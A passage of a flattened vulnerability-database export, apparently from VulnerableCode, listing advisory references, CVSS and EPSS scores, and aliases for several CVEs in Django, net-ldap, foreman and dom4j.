scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:0265
4
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-7536.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-7536.json
5
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-7536
reference_id
reference_type
scores
0
value 0.01372
scoring_system epss
scoring_elements 0.80172
published_at 2026-04-01T12:55:00Z
1
value 0.01372
scoring_system epss
scoring_elements 0.80188
published_at 2026-04-07T12:55:00Z
2
value 0.01372
scoring_system epss
scoring_elements 0.80216
published_at 2026-04-08T12:55:00Z
3
value 0.01372
scoring_system epss
scoring_elements 0.80226
published_at 2026-04-09T12:55:00Z
4
value 0.01372
scoring_system epss
scoring_elements 0.80199
published_at 2026-04-04T12:55:00Z
5
value 0.01372
scoring_system epss
scoring_elements 0.80179
published_at 2026-04-02T12:55:00Z
6
value 0.01372
scoring_system epss
scoring_elements 0.80244
published_at 2026-04-11T12:55:00Z
7
value 0.01372
scoring_system epss
scoring_elements 0.8023
published_at 2026-04-12T12:55:00Z
8
value 0.01372
scoring_system epss
scoring_elements 0.80224
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-7536
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7536
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7536
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7537
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7537
8
reference_url https://github.com/advisories/GHSA-r28v-mw67-m5p9
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-r28v-mw67-m5p9
9
reference_url https://github.com/django/django
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django
10
reference_url https://github.com/django/django/commit/1ca63a66ef3163149ad822701273e8a1844192c2
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/1ca63a66ef3163149ad822701273e8a1844192c2
11
reference_url https://github.com/django/django/commit/abf89d729f210c692a50e0ad3f75fb6bec6fae16
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/abf89d729f210c692a50e0ad3f75fb6bec6fae16
12
reference_url https://github.com/django/django/commit/e157315da3ae7005fa0683ffc9751dbeca7306c8
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/e157315da3ae7005fa0683ffc9751dbeca7306c8
13
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2018-5.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2018-5.yaml
14
reference_url https://lists.debian.org/debian-lts-announce/2018/03/msg00006.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/03/msg00006.html
15
reference_url https://usn.ubuntu.com/3591-1
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3591-1
16
reference_url https://usn.ubuntu.com/3591-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/3591-1/
17
reference_url https://web.archive.org/web/20200227131019/http://www.securityfocus.com/bid/103361
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200227131019/http://www.securityfocus.com/bid/103361
18
reference_url https://www.debian.org/security/2018/dsa-4161
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2018/dsa-4161
19
reference_url https://www.djangoproject.com/weblog/2018/mar/06/security-releases
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.djangoproject.com/weblog/2018/mar/06/security-releases
20
reference_url https://www.djangoproject.com/weblog/2018/mar/06/security-releases/
reference_id
reference_type
scores
url https://www.djangoproject.com/weblog/2018/mar/06/security-releases/
21
reference_url http://www.securityfocus.com/bid/103361
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/103361
22
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1549777
reference_id 1549777
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1549777
23
reference_url https://security.archlinux.org/ASA-201803-5
reference_id ASA-201803-5
reference_type
scores
url https://security.archlinux.org/ASA-201803-5
24
reference_url https://security.archlinux.org/AVG-649
reference_id AVG-649
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-649
25
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-7536
reference_id CVE-2018-7536
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-7536
fixed_packages
aliases CVE-2018-7536, GHSA-r28v-mw67-m5p9, PYSEC-2018-5
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mv1p-yxvp-pbh6
50
url VCID-mv26-fzn6-vycf
vulnerability_id VCID-mv26-fzn6-vycf
summary 
No validation of hostname certificate
Net-ldap does not validate the hostname certificate. Ruby is relying on OpenSSL, and one common mistake made by users of OpenSSL is to assume that OpenSSL will validate the hostname in the server's certificate. did not perform hostname validation. and up contain support for hostname validation, but they still require the user to call a few functions to set it up.
references
0
reference_url http://openwall.com/lists/oss-security/2017/12/17/10
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://openwall.com/lists/oss-security/2017/12/17/10
1
reference_url http://ruby-doc.org/stdlib-1.9.3/libdoc/openssl/rdoc/OpenSSL/SSL.html#method-c-verify_certificate_identity
reference_id
reference_type
scores
url http://ruby-doc.org/stdlib-1.9.3/libdoc/openssl/rdoc/OpenSSL/SSL.html#method-c-verify_certificate_identity
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-17718.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-17718.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-17718
reference_id
reference_type
scores
0
value 0.00172
scoring_system epss
scoring_elements 0.38515
published_at 2026-04-11T12:55:00Z
1
value 0.00172
scoring_system epss
scoring_elements 0.38501
published_at 2026-04-09T12:55:00Z
2
value 0.00172
scoring_system epss
scoring_elements 0.38492
published_at 2026-04-08T12:55:00Z
3
value 0.00172
scoring_system epss
scoring_elements 0.38441
published_at 2026-04-07T12:55:00Z
4
value 0.00172
scoring_system epss
scoring_elements 0.38578
published_at 2026-04-04T12:55:00Z
5
value 0.00172
scoring_system epss
scoring_elements 0.38417
published_at 2026-04-01T12:55:00Z
6
value 0.00172
scoring_system epss
scoring_elements 0.38554
published_at 2026-04-02T12:55:00Z
7
value 0.00172
scoring_system epss
scoring_elements 0.38453
published_at 2026-04-13T12:55:00Z
8
value 0.00172
scoring_system epss
scoring_elements 0.38478
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-17718
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17718
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17718
5
reference_url https://github.com/ruby-ldap/ruby-net-ldap
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ruby-ldap/ruby-net-ldap
6
reference_url https://github.com/ruby-ldap/ruby-net-ldap/issues/258
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements
1
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ruby-ldap/ruby-net-ldap/issues/258
7
reference_url https://github.com/ruby-ldap/ruby-net-ldap/pull/279
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ruby-ldap/ruby-net-ldap/pull/279
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-17718
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:N/A:N
1
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-17718
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1527048
reference_id 1527048
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1527048
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=884693
reference_id 884693
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=884693
11
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.0.5:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.0.5:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.0.5:*:*:*:*:ruby:*:*
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.10.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.10.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.10.0:*:*:*:*:ruby:*:*
13
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.10.1:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.10.1:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.10.1:*:*:*:*:ruby:*:*
14
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.1.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.1.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.1.0:*:*:*:*:ruby:*:*
15
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.1.1:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.1.1:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.1.1:*:*:*:*:ruby:*:*
16
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.11:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.11:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.11:*:*:*:*:ruby:*:*
17
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.12.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.12.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.12.0:*:*:*:*:ruby:*:*
18
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.12.1:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.12.1:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.12.1:*:*:*:*:ruby:*:*
19
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.13.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.13.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.13.0:*:*:*:*:ruby:*:*
20
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.14.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.14.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.14.0:*:*:*:*:ruby:*:*
21
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.15.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.15.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.15.0:*:*:*:*:ruby:*:*
22
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.2.1:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.2.1:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.2.1:*:*:*:*:ruby:*:*
23
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.2.2:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.2.2:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.2.2:*:*:*:*:ruby:*:*
24
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.2:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.2:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.2:*:*:*:*:ruby:*:*
25
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.3.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.3.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.3.0:*:*:*:*:ruby:*:*
26
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.3.1:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.3.1:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.3.1:*:*:*:*:ruby:*:*
27
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.5.1:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.5.1:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.5.1:*:*:*:*:ruby:*:*
28
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.6.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.6.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.6.0:*:*:*:*:ruby:*:*
29
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.6.1:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.6.1:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.6.1:*:*:*:*:ruby:*:*
30
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.7.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.7.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.7.0:*:*:*:*:ruby:*:*
31
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.8.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.8.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.8.0:*:*:*:*:ruby:*:*
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.9.0:*:*:*:*:ruby:*:*
reference_id cpe:2.3:a:net-ldap_project:net-ldap:0.9.0:*:*:*:*:ruby:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:net-ldap_project:net-ldap:0.9.0:*:*:*:*:ruby:*:*
33
reference_url https://github.com/advisories/GHSA-m7p8-9w66-9frm
reference_id GHSA-m7p8-9w66-9frm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m7p8-9w66-9frm
34
reference_url https://access.redhat.com/errata/RHSA-2020:1454
reference_id RHSA-2020:1454
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1454
fixed_packages
aliases CVE-2017-17718, GHSA-m7p8-9w66-9frm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mv26-fzn6-vycf
51
url VCID-mwus-fmc5-27f2
vulnerability_id VCID-mwus-fmc5-27f2
summary 6: XSS in discovery rule filter autocomplete functionality
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-12175.json
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-12175.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-12175
reference_id
reference_type
scores
0
value 0.00473
scoring_system epss
scoring_elements 0.64624
published_at 2026-04-01T12:55:00Z
1
value 0.00473
scoring_system epss
scoring_elements 0.64677
published_at 2026-04-02T12:55:00Z
2
value 0.00473
scoring_system epss
scoring_elements 0.64705
published_at 2026-04-04T12:55:00Z
3
value 0.00473
scoring_system epss
scoring_elements 0.64663
published_at 2026-04-07T12:55:00Z
4
value 0.00473
scoring_system epss
scoring_elements 0.64711
published_at 2026-04-08T12:55:00Z
5
value 0.00473
scoring_system epss
scoring_elements 0.64726
published_at 2026-04-09T12:55:00Z
6
value 0.00473
scoring_system epss
scoring_elements 0.64743
published_at 2026-04-11T12:55:00Z
7
value 0.00473
scoring_system epss
scoring_elements 0.64731
published_at 2026-04-12T12:55:00Z
8
value 0.00473
scoring_system epss
scoring_elements 0.64703
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-12175
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1498976
reference_id 1498976
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1498976
fixed_packages
aliases CVE-2017-12175
risk_score 1.6
exploitability 0.5
weighted_severity 3.1
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mwus-fmc5-27f2
52
url VCID-nhvk-z1d5-huce
vulnerability_id VCID-nhvk-z1d5-huce
summary foreman: unauthorized cache read on RPM-based installations through local user
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14334.json
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14334.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-14334
reference_id
reference_type
scores
0
value 0.00111
scoring_system epss
scoring_elements 0.29477
published_at 2026-04-12T12:55:00Z
1
value 0.00111
scoring_system epss
scoring_elements 0.29546
published_at 2026-04-02T12:55:00Z
2
value 0.00111
scoring_system epss
scoring_elements 0.29594
published_at 2026-04-04T12:55:00Z
3
value 0.00111
scoring_system epss
scoring_elements 0.29415
published_at 2026-04-07T12:55:00Z
4
value 0.00111
scoring_system epss
scoring_elements 0.29518
published_at 2026-04-09T12:55:00Z
5
value 0.00111
scoring_system epss
scoring_elements 0.29521
published_at 2026-04-11T12:55:00Z
6
value 0.00111
scoring_system epss
scoring_elements 0.29425
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-14334
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1858284
reference_id 1858284
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1858284
3
reference_url https://access.redhat.com/errata/RHSA-2020:4127
reference_id RHSA-2020:4127
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4127
4
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2020-14334
risk_score 4.0
exploitability 0.5
weighted_severity 7.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nhvk-z1d5-huce
53
url VCID-nmya-eyxd-9ybe
vulnerability_id VCID-nmya-eyxd-9ybe
summary dom4j version prior to version 2.1.1 contains a CWE-91: XML Injection vulnerability in Class: Element. Methods: addElement, addAttribute that can result in an attacker tampering with XML documents through XML injection. This attack appear to be exploitable via an attacker specifying attributes or elements in the XML document. This vulnerability appears to have been fixed in 2.1.1 or later.
references
0
reference_url https://access.redhat.com/errata/RHSA-2019:0362
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:0362
1
reference_url https://access.redhat.com/errata/RHSA-2019:0364
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
